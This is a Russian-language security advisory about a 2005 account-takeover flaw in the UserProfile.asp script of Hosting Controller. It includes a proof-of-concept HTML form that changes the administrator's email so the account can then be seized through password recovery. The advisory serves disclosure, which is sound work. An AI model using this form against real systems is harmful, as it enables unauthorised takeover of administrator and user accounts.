Security Lab

Обход ограничений безопасности в Hosting Controller

Дата публикации:30.05.2005
Всего просмотров:1329
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Hosting Controller 6.1 HotFix 2.0 и более ранние версии

Описание:
Уязвимость позволяет удаленному авторизованному пользователю получить доступ к учетным записям других пользователей.

Уязвимость существует в сценарии 'UserProfile.asp' из-за недостаточной обработки правил доступа. Удаленный авторизованный пользователь может изменить e-mail целевого пользователя и затем воспользоваться формой восстановления пароля, чтобы получить доступ к учетной записи жертвы. Таким образом, злоумышленник может получить доступ к произвольной учетной записи приложения, в том числе, и к учетной записи администратора. Пример:

<form
action="http://[URL]/admin// accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
< br>
emailaddress : <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
< br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
< br>
< input name="submit" value="submit" type="submit">
< /form>

URL производителя: www.hostingcontroller.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки: Hosting Controller 'UserProfile.asp' Lets Remote Authenticated Users Modify Other User Profiles